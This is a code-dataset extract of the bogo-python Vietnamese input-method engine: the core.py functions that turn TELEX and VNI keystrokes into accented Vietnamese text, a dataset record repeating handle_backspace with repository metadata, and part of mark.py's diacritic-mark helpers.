# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | handle_backspace | python | def handle_backspace(converted_string, raw_sequence, im_rules=None):
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence | Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence(). | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L492-L545 | [
"def process_sequence(sequence,\n rules=None,\n skip_non_vietnamese=True):\n \"\"\"\\\n Convert a key sequence into a Vietnamese string with diacritical marks.\n\n Args:\n rules (optional): see docstring for process_key().\n skip_non_vietnamese (optiona... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
|
BoGoEngine/bogo-python | bogo/mark.py | get_mark_char | python | def get_mark_char(char):
char = accent.remove_accent_char(char.lower())
if char == "":
return Mark.NONE
if char == "đ":
return Mark.BAR
if char in "ă":
return Mark.BREVE
if char in "ơư":
return Mark.HORN
if char in "âêô":
return Mark.HAT
return Mark.NONE | Get the mark of a single char, if any. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/mark.py#L50-L65 | [
"def remove_accent_char(char):\n \"\"\"\n Remove accent from a single char, if any.\n \"\"\"\n return add_accent_char(char, Accent.NONE)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with marks, which are diacritical markings
to change the base sound of a character but not its tonal quality.
E.g. the hat mark in â.
"""
from __future__ import unicode_literals
from bogo import accent, utils
Accent = accent.Accent
class Mark:
HAT = 4
HORN = 3
BREVE = 2
BAR = 1
NONE = 0
FAMILY_A = "aăâ"
FAMILY_E = "eê"
FAMILY_O = "oơô"
FAMILY_U = "uư"
FAMILY_D = "dđ"
# TODO: Monstrous code. Needs refactoring.
def add_mark(components, mark):
comp = list(components)
if mark == Mark.BAR and comp[0] and comp[0][-1].lower() in FAMILY_D:
comp[0] = add_mark_at(comp[0], len(comp[0])-1, Mark.BAR)
else:
#remove all marks and accents in vowel part
raw_vowel = accent.add_accent(comp, Accent.NONE)[1].lower()
raw_vowel = utils.join([add_mark_char(c, Mark.NONE) for c in raw_vowel])
if mark == Mark.HAT:
pos = max(raw_vowel.find("a"), raw_vowel.find("o"),
raw_vowel.find("e"))
comp[1] = add_mark_at(comp[1], pos, Mark.HAT)
elif mark == Mark.BREVE:
if raw_vowel != "ua":
comp[1] = add_mark_at(comp[1], raw_vowel.find("a"), Mark.BREVE)
elif mark == Mark.HORN:
if raw_vowel in ("uo", "uoi", "uou"):
comp[1] = utils.join([add_mark_char(c, Mark.HORN) for c in comp[1][:2]]) + comp[1][2:]
elif raw_vowel == "oa":
comp[1] = add_mark_at(comp[1], 1, Mark.HORN)
else:
pos = max(raw_vowel.find(""), raw_vowel.find("o"))
comp[1] = add_mark_at(comp[1], pos, Mark.HORN)
if mark == Mark.NONE:
if not raw_vowel == comp[1].lower():
comp[1] = raw_vowel
elif comp[0] and comp[0][-1] == "đ":
comp[0] = comp[0][:-1] + "d"
return comp
def add_mark_at(string, index, mark):
"""
Add mark to the index-th character of the given string. Return the new string after applying change.
Notice: index > 0
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + add_mark_char(string[index], mark) + string[index+1:]
def add_mark_char(char, mark):
"""
Add mark to a single char.
"""
if char == "":
return ""
case = char.isupper()
ac = accent.get_accent_char(char)
char = accent.add_accent_char(char.lower(), Accent.NONE)
new_char = char
if mark == Mark.HAT:
if char in FAMILY_A:
new_char = "â"
elif char in FAMILY_O:
new_char = "ô"
elif char in FAMILY_E:
new_char = "ê"
elif mark == Mark.HORN:
if char in FAMILY_O:
new_char = "ơ"
elif char in FAMILY_U:
new_char = "ư"
elif mark == Mark.BREVE:
if char in FAMILY_A:
new_char = "ă"
elif mark == Mark.BAR:
if char in FAMILY_D:
new_char = "đ"
elif mark == Mark.NONE:
if char in FAMILY_A:
new_char = "a"
elif char in FAMILY_E:
new_char = "e"
elif char in FAMILY_O:
new_char = "o"
elif char in FAMILY_U:
new_char = "u"
elif char in FAMILY_D:
new_char = "d"
new_char = accent.add_accent_char(new_char, ac)
return utils.change_case(new_char, case)
